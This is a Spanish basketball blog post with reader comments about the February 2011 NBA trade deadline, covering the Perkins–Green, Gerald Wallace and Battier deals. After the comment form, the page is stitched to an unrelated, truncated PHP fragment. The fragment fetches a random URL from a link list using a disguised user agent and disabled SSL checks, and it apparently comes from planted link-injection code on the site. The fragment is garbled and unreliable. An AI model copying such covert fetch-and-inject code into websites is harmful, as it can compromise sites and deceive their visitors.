Fin de fiesta con fuegos artificiales

24 de February de 2011 por txusma

Hace unas horas nos preguntábamos si estaba siendo el mejor trade deadline de la historia. A pesar de que un humilde servidor se equivocaba al contar el número de All Stars traspasados, los nombres de los jugadores que cambiaban de equipo eran importantes, entre ellos 2 auténticos jugadores-franquicia como Carmelo Anthony o Deron Williams. Aún quedaban entre 5 ó 6 horas para que finalizara el plazo de traspasos y os podemos asegurar que las franquicias lo han aprovechado a la perfección. Repasemos los últimos movimientos, dejando el análisis sesudo para más adelante:

Los Boston Celtics se han movido y mucho pero en una dirección un tanto extraña. Han enviado a Kendrick Perkins y Nate Robinson a OKC a cambio de Jeff Green y Nenad Krstic, a Marquis Daniels (que podría perderse el resto de la temporada) a Sacramento a cambio de dinero y a Erden y Harangody a los Cavs a cambio de una 2ª ronda. En unos minutos la plantilla de los Celtics ha sufrido un cambio considerable y posiblemente sin esperarlo. El traspaso de Perkins ha dejado lívidos a Garnett, Allen y Pierce y podría ser debido a que el jugador se convierte en agente libre sin restricciones este verano y los Celtics no tienen el dinero que posiblemente pediría para renovar. Ante esta situación han preferido traspasarlo consiguiendo a un 3-4 joven que vendría a ser el recambio de Kevin Garnett en un horizonte de reconstrucción. La salida de Erden y Harangody deja espacio para los fichajes de posibles veteranos que hagan un buyout de sus contratos como Troy Murphy o RIP Hamilton. El fichaje de Daniels permite a los Kings ponerse por encima del mínimo salarial.

Como comentamos anteriormente los Thunder se han hecho con el center que llevaban años buscando y que les ha de suponer un salto de calidad notable. Además se han hecho también con Nazr Mohameed, de los Bobcats, a cambio de Mo Pete y DJ White.

Ante los movimientos de dos equipos de la parte alta de la liga, casi queda en un segundo plano el traspaso de otro All Stars (y van 7). Gerald Wallace llega a los Blazers a cambio de Joel Pryzbilla, 2 primeras rondas y Dante Cunningham. Jordan traspasa al ‘bobcat’ original pensando más en el futuro. No sé vosotros, pero yo no sé si dejaría en las manos del mejor jugador de la historia este delicado proceso.

Otro equipo que también se ha movido ha sido Houston Rockets. Por un lado han enviado a Aaron Brooks a los Suns a cambio de Goran Dragic y una 1ª ronda y por el otro a Shane Battier a los Grizzlies a cambio de Hasheem Thabett y otra primera ronda. Brooks no estaba contento con su papel en el equipo esta temporada, Battier llega a Memphis para cubrir la baja de 3 semanas de Rudy Gay y aportar liderazgo y experiencia y Thabeet otorga a los Rockets lo que les falta desde la lesión de Yao Ming: centímetros. Eso sí, no muy bien utilizados. El traspaso también otorga más importancia en el equipo tejano a Chase Budinger y Courtney Lee.

Durante unos minutos también se comentó que OJ Mayo estaba traspasado a los Pacers a cambio de Mc Roberts y una 1ª ronda pero finalmente el trade no se ha podido realizar por problemas en las negociaciones a ultimísima hora. Es lo que tiene dejar el trabajo para el final. ¿Qué cuerpo se te queda cuando sabes que tu equipo te tenía traspasado? ¿Cómo afrontas el resto de la temporada?

Comenta

21 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Brutaaaaaaaaal.

      Citar

  2. Hynreck dice:
    #2

    Tremendo Txus. Enhorabuena.

      Citar

  3. Hynreck dice:
    #3

    Ahora analizando un poco.
    Boston consigue un recambio perfecto para Pierce y Garnett con Green, pero el puesto de base suplente lo dejan descalzo sin Nate (decir Delonte es de risa). Deberían haber intentado meter a Maynor. Por los Thunder está claro que necesitaban dureza interior, pero Perkins es un jugador limitado. No me parece un buen traspaso para ellos, ya que Green era uno de sus pilares de futuro.
    Una pena lo de Mayo, en Indiana hubiese encajado bien.

      Citar

  4. CAMPO2 dice:
    #4

    Vaya fin de fiesta

      Citar

  5. TheDeerHunter dice:
    #5

    Impresionante… el jefe no se deja nada en el tintero.

    Tengo una máxima. Si funciona no lo toques. No entiendo la tijera de Ainge por mucho fin de contrato de Perkins que hubiera. Se están jugando nada menos que el anillo y puede que sea la última oportunidad que tengan!!! Y mira que me gusta Jeff Green para los Celtics, pero no a cambio de tanto, me parece.
    Es curioso… pero ya que hablábais del 2k11 el otro día ¿no os ha pasado que habéis anticipado ciertos movimientos que luego se hacen verdad en la liga? Con mi asociación llevando a los Thunder lo primero que hice fue traspasar a Jeff Green a los Celtics, en mi caso a cambio de Jermaine y Davis, aunque la idea era la misma. Y no es la primera vez que me pasa algo similar. Por supuesto, opino que los Thunder han reforzado muy bien su posición… y cuidadito con ellos.

    Luego lo de los Bobcats… es incalificable. Cómo han pescado ahí los Blazers… ¿no tenían los Lakers algún paquete similar a Przybilla para haber sacado una tajada como esa? Gran movimiento y le va a venir de perlas a McMillan.

    En fin… una pasada el fin de fiesta. Y Txusma es un crack.

      Citar

  6. Sempren dice:
    #6

    La ostia! Lo cierto es que los Celtics quedan bastante “cojos”. Krstic no me parece nada malo, pero no ha marcado las diferencias en Oklahoma, como para hacerlo en Boston. Podría entenderlo, pero con la edad del Big Three y las dudas en Miami (que se supone que el año que viene serán mejor equipo) y LA, era su mejor oportunidad para llevarse el anillo.
    Y vale que Robinson sea un cabra loca, pero lo tenían bastante amaestrado, y fiarse de un Delonte que acaba de volver y no da cogido continuidad…
    Además, que se juntan 3 PFs con Green, Garnett y Big Baby, aunque supongo que cualquiera de los dos últimos pueden jugar como centers sin problemas.

    Por otra parte, entiendo que a Grizzlies les hiciera falta alguien de peso por fuera, sobre todo sin Gay, pero Young estaba haciendo unos muy buenos números, tanto con Gay como sin él, y con la vuelta del campeón del mundo…

    Los Bobcats no sé a qué juegan, pero bueno, lo habitual.

    En Portland tampoco los veo demasiado bien, han dejado ir a los dos últimos tíos que jugaban de centers, para conseguir un cromo “repetido”. Evidentemente Wallace debería hacerlo mucho mejor que Batum, pero no es una posición que tuviesen tan coja. Supongo que estarán rezando para que Camby y Oden vuelvan, porque LaMarcus no creo que sea del tipo de jugadores que mejor se adapte a pelearse por los rebotes con los centers contrarios, y menos sin otro PF de prestigio en el puesto (o al menos no se me ocurre ninguno ahora mismo)

      Citar

  7. Viva_Dirk dice:
    #7

    Con Roy recuperado al 100% los Blazers tendrian una plantilla muy buena, Wallace cubre precisamente las carencias de LaMarcus y es un jugador de gran nivel.

      Citar

  8. Tweets that mention Fin de fiesta con fuegos artificiales | tjnba.com -- Topsy.com dice:
    #8
  9. Rompe dice:
    #9

    Impresionante el trabajo del blog y de Txusma con esto de los traspasos!! Gracias señores!!

    Por cierto, volviendo un poco a la rutina de los partidos jeje… Impresionante 1 / 18 de Bosh! Y aún así se quedan a 4 puntos de los Bulls…

      Citar

  10. -=TheKing=- dice:
    #10

    Dios los Celtics dependen ahora demasiada de Delonte porque Rondo no jugara el 100% del tiempo de los partidos, y no veo subiendo la bola a Ray Allen; que feo ha quedad el equipo en esa posición,

    o walfer puede hacer de base???????????????????

      Citar

  11. Denise dice:
    #11

    Yo creo que Jordan quiere batir un record y pasar a la historia como el mejor jugador de baloncesto de la historia y el peor general manager de la historia.
    McMillan aún no debe estar creyendoselo.

      Citar

  12. Txusma dice:
    #12

    Lo curioso es que Jordan no es el GM de los Bobcats sinó el propietario. Pq siempre le damos las culpas de todo?

    Y de hecho, bajo el mando de Jordan los Bobcats llegaron el año pasado a sus primeros Playoffs de la historia. Además es el típico movimiento que se puede ver todos los años: Jugador de calidad que es traspasado a cambio de un expiring. Hasta aquí nada que decir. Ahora cuando Jordan (o su GM) han de demostrar que son capaces de conducir la reconstrucción.

      Citar

  13. Ru dice:
    #13

    Pues lo de Boston ha sido lo que más me ha descolocado de todos los traspasos,más que el de Deron Williams,aunque bien es cierto que tal como lo ha argumentado txusma lo encuentro justificado.De todas formas los máximos beneficiados son los Thunder que añaden matraca en el center con Perkins y Mohammed,por más que hayan dado a Jeff Green que en mi opinión había tocado techo en Oklahoma.Para este jugador nuevo paso en su carrera a la vera de KG y si éste fue capaz de hacer de Big Baby un buen jugador no tengo ninguna duda de que Green explotará,si es paciente,en Boston.A ver qué veteranos pescan ahora los verdes pero como consigan a alguno de esos que se nombran candidatos nº1 al anillo.

    Lo de Jordan….vaya regalazo madre mía.En Charlotte van a hacer la misma estatua que hay en el United Center pero colocada al revés,con la cabeza de MJ contra el suelo.Y en Portland cuando los rumores hacían indicar que debilitarían el equipo van y te juntan a Andre Miller-“Roy”-Wallace-Aldridge-Camby….considerando lesiones está ahí un tal Matthews que está haciendo una gran temporada.Equipo de PO sin ninguna duda y veremos si con la progresión de Aldridge y la incoporación de Gerald Wallace no dan algún susto en la postemporada.Me lo estoy imaginando….Rudy no se adapta a Portland y quiere cambiar de aires xDDD

      Citar

  14. Denise dice:
    #14

    Pero todas las operaciones del GM pasan antes por el sí o no de Jordan, que al fin y al cabo, acaba siendo el que le da el visto bueno.

      Citar

  15. Txusma dice:
    #15

    Yo el movimiento Bobcat tampoco lo veo tan desastre. Hace unos años, los Grizzlies traspasaron a un jugador 30 veces mejor que Wallace por nada (Marc no era nada por aquella época) a los Lakers y ahora están en una buena situación que sería aún mejor si los picks de Mayo y Thabeet hubieran medio funcionado.

      Citar

  16. Denise dice:
    #16

    Se me olvidó decir, yo, al menos, ya que regalo a Gerald Wallace, hubiera intentado hacerme con Batum, pedazo de jugador bastante infravalorado.
    @Ru: De acuerdo con lo de Rudy, ya mismo saldrá a la palestra con otra pataleta.

      Citar

  17. TheDeerHunter dice:
    #17

    Si Jordan no es el GM a buen seguro que ejerce como tal.
    El movimiento a mí, con justificaciones de expirings y con lo que se quiera, me parece una castaña pilonga. Y en la situación salarial de los Bobcats lo entiendo bastante menos aún.
    Reconstrucción eterna!!!

    Y bueno… a ver si con este equipo se le empieza a exigir algo más que una primera ronda (o ni eso) a McMillan.

      Citar

  18. Nacho dice:
    #18

    Aparte de que Perkins sea agente libre en el verano, ¿no pueden haber mandado los Celtics una rodilla escacharrada antes de que lo note todo el mundo? A mí el año pasado ya me dio la impresión de que si volvía este animal era para jugar veinte minutitos, no más. ¡Ojalá me equivoque!, más que nada por el chaval, pero me da que es un tipo que no volverá a ser es que era.

      Citar

  19. pcerezo dice:
    #19

    Lo de Jordan es un negocio. Creo. No se explica desde otro punto de vista.
    Lo de los Celtics más difícil de ver. Pero me imagino que Doc Rivers tendrá claro que pueden ganar su conferencia sin Perkins. Para mí siguen siendo favoritos del Este.
    Oklahoma sale muy reforzado de cara a los últimos dos meses de competición. Experiencia y kilos. Buena combinación.
    Me ha extrañado que Orlando o Bulls no hayan hecho ningún movimiento. Lo de los primeros no veo nada claro como va a acabar eso y los Bulls podrían haber potenciado la posición de dos con un buen alero para hacer una plantilla tremenda.

    Un saludo,
    Pablo

      Citar

  20. TheDeerHunter dice:
    #20

    A Perkins le vi hace poco y me pareció más o menos como siempre… que tampoco fue nunca Olajuwon, ni siquiera Mutombo o Mourning… y es cierto que no le iban a renovar por la pasta que pedía. Teniendo a Shaq y Maine mínimamente operativos no le veo mayor problema, pero no es el caso y al Serbio no le veo como Center ideal para una defensa como la que necesitan ellos para ser campeones. Igual me equivoco con este punto.Green sí me parece un buen elemento para ellos pero no podrá ser aprovechado al 100% por que su posición está bien cubierta.
    Seguramente siguen siendo favoritos, pero a mí me parece que un poco menos que antes de la fecha de traspasos.

    Por mi parte los ganadores de todo esto son claramente los Blazers, y no sólo por el fichaje de Wallace.

    Tampoco hemos hablado demasiado de la cagada con Mayo.

      Citar

  21. Viva_Dirk dice:
    #21

    Mayo podria haber sido un gran fichaje para los Bulls, viendo el precio por el que lo vendian no entiendo que no se moviera.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>